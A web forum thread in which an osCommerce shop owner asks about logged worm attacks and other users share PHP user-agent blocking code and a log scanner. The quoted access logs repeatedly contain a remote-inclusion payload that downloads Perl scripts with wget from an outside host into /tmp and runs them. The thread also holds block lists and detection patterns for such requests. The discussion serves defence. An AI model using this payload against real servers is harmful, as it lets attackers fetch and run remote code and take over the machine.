
PandA.nl

worm infection?


My host sent me a message about a worm infection. They suspect the osCommerce script causes the problem :(

 

(By the way I don't have phpBB on the site)

 

They sent me this info about it:

panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:41 +0100] "GET /conditions.php?osCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 27696 "-" "LWP::Simple/5.800"

panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:42 +0100] "GET /shopping_cart.php?osCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 23367 "-" "LWP::Simple/5.800"

panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:42 +0100] "GET /redirect.php?action=manufacturer&manufacturers_id=61&osCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 302 5 "-" "LWP::Simple/5.800"

panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:43 +0100] "GET /redirect.php?action=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 302 5 "-" "LWP::Simple/5.800"

panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:44 +0100] "GET /index.php?manufacturers_id=61&osCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 33435 "-" "LWP::Simple/5.800"

panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:45 +0100] "GET /index.php?manufacturers_id=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 19601 "-" "LWP::Simple/5.800"

panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:45 +0100] "GET /specials.php?osCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 28147 "-" "LWP::Simple/5.800"

panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:46 +0100] "GET /product_info.php?products_id=396&osCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 23558 "-" "LWP::Simple/5.800"

panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:47 +0100] "GET /reviews.php?osCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 36272 "-" "LWP::Simple/5.800"

panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:47 +0100] "GET /product_reviews_write.php?products_id=290&osCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 302 5 "-" "LWP::Simple/5.800"

panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:48 +0100] "GET /product_reviews_write.php?products_id=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 302 5 "-" "LWP::Simple/5.800"

panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:49 +0100] "GET /index.php?osCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 32331 "-" "LWP::Simple/5.800"

panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:49 +0100] "GET /product_info.php?cPath=77&products_id=290&osCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 19058 "-" "LWP::Simple/5.800"

panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:54 +0100] "GET /product_info.php?cPath=77&products_id=290&language=en&osCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 19077 "-" "LWP::Simple/5.800"

panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:51:08 +0100] "GET /product_info.php?products_id=291&cPath=77&osCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 25476 "-" "LWP::Simple/5.800"

panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:51:22 +0100] "GET /index.php?cPath=69&osCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 46505 "-" "LWP::Simple/5.800"

panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:51:50 +0100] "GET /index.php?cPath=24&osCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 27395 "-" "LWP::Simple/5.800"

 

Does anybody know what this means? And what I can do?

(I will contact the host too, but not today, since it's Christmas)


Please do not PM me for support, I will not respond anyway.


Would switching off perl help maybe? (see posted log)

 

I don't need perl for the site, as far as I know :huh:



We've had this website in our site too, "www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.vi" etc etc

 

CHEMO, you say just eating bandwidth and nothing to worry about, have you heard of this before then?

 

Derek


CHEMO

 

Just did a search on Google and found that.

 

Just added the following to the top of my index.php as suggested...

 

// $REQUEST_URI as a bare variable only exists with register_globals on; read it from $_SERVER.
// strpos() returns false when the string is absent, so test against false rather than "> 0".
if (strpos($_SERVER['REQUEST_URI'], 'visualcoders.net') !== false) {
  exit;
}

 

Not sure if it will help though

 

Derek
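As an added defender-side example (not code from this thread or from osCommerce), the Python below scans lines in the format the host posted and flags every request whose parameter value is itself a URL, the pattern in the log above, whatever host it names and whatever user agent sends it; this is the general form of the check Derek's 'visualcoders.net' string match approximates, and it also reports the user agent per flagged request. The sample log lines are constructed; the 192.0.2.10 and 198.51.100.7 addresses and example.test are documentation placeholders.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, unquote

# Constructed sample lines in the Apache combined format of the host's excerpt;
# the first keeps the "file:" prefix that grep adds. The injected values mirror
# the thread's log; 192.0.2.10 and 198.51.100.7 are documentation addresses.
SAMPLE_LOG = """\
panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:41 +0100] "GET /conditions.php?osCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;perl%20spybot.txt HTTP/1.1" 200 27696 "-" "LWP::Simple/5.800"
192.0.2.10 - - [25/Dec/2004:03:01:02 +0100] "GET /product_info.php?products_id=290&osCsid=8f1c0a HTTP/1.1" 200 19058 "-" "Mozilla/5.0"
198.51.100.7 - - [25/Dec/2004:03:05:09 +0100] "GET /index.php?cPath=24&osCsid=https://example.test/x.gif?&cmd=id HTTP/1.1" 200 27395 "-" "libwww-perl/5.800"
"""

# Apache combined log line, with an optional "path:" prefix before the address.
LOG_RE = re.compile(
    r'^(?:\S+?:)?(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"')

def query_params(target):
    """Split the query by hand: a ';' inside a value belongs to the injected
    shell command and must not be treated as a parameter separator."""
    params = []
    for part in urlsplit(target).query.split('&'):
        if part:
            name, _, value = part.partition('=')
            params.append((name, unquote(value)))
    return params

def url_valued_params(target):
    """Parameters whose value is a URL: a real osCsid is a session id, never a URL."""
    return [n for n, v in query_params(target)
            if re.match(r'(https?|ftp)://', v, re.I)]

def scan(log_text):
    """One finding per request carrying a URL in a parameter (source IP, agent)."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m is None:
            continue
        hits = url_valued_params(m['target'])
        if hits:
            findings.append({'ip': m['ip'], 'ua': m['ua'],
                             'params': hits, 'status': m['status']})
    return findings

def agents_seen(findings):
    """Flagged requests per user agent: the value the thread asks how to find."""
    return Counter(f['ua'] for f in findings)
```

Run scan() over the real access_log lines to see which parameters were targeted and which agents sent the requests before deciding on a block rule.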


I would block the user agent but that is a personal choice...

 

I happen to have my own server so just added it to my Apache config file to reject that "bad bot" agent.


Thanks for your tips!

 

I would block the user agent but that is a personal choice...

 

I happen to have my own server so just added it to my Apache config file to reject that "bad bot" agent.

stupid question probably, but could you tell me how to find out what the user agent is?

 

I also found this thread on the forums, it seems to be related

http://forums.oscommerce.com/index.php?sho...14entry511814

So I will try to block by user agent, and ask the host to upgrade PHP also.


The user agent is "LWP::Simple/5.800".

thanks steve, going to add that one right away! (almost bedtime here, think I will sleep much better now :) )

 

Since I think I will need to know the user agent more often in the near future, could you tell me how I can find out myself next time?



Hi Derek,

 

it does not seem to help after all. It seems not to be visualcoders itself where the problem comes from (in my case), it's coming from lots and lots of different ip addresses from all over the world (so I guess the user agent will be different too).

 

I included this into my application_top.php and added a blocked_agents.txt file to the includes directory (just as how the spider sessions are suppressed)

// banned user agents
define('BLOCK_BY_USER_AGENT', 'True');
if (BLOCK_BY_USER_AGENT == 'True') {
  // read the agent from $_SERVER; getenv() returns false when the header is missing,
  // which the original is_null() test never caught
  $user_agent = isset($_SERVER['HTTP_USER_AGENT']) ? strtolower($_SERVER['HTTP_USER_AGENT']) : '';

  if ($user_agent != '') {
    // one substring per line; the agent is lowercased above, so the entries must be lowercase too
    $blocked_agents = file('includes/blocked_agents.txt');

    for ($i=0, $n=sizeof($blocked_agents); $i<$n; $i++) {
      $pattern = trim($blocked_agents[$i]);
      // skip blank lines (e.g. a trailing newline): on PHP 8 strpos() with an empty
      // needle matches at position 0 and would block every visitor
      if ($pattern == '') continue;
      if (strpos($user_agent, $pattern) !== false) {
        exit('This user agent seems to be blocked!');
      }
    }
  }
}

 

Or maybe the above script itself does function properly? Didn't have to test it properly yet.



:blush: I didn't think, I am using the code from the osC spider session script, but I didn't notice the "strtolower", and added the agent name using capitals. Now I added "lwp" (without the quotes) to the list. Don't know if it works yet , suddenly they all come and the next moment they're all gone again.



blocking only "lwp::simple/5.800" does not seem enough, but it looks like blocking all "lwp" does help.

 

Would it be wise to block all "lwp" user agents? Or am I blocking important search engines and/or lots of users too?


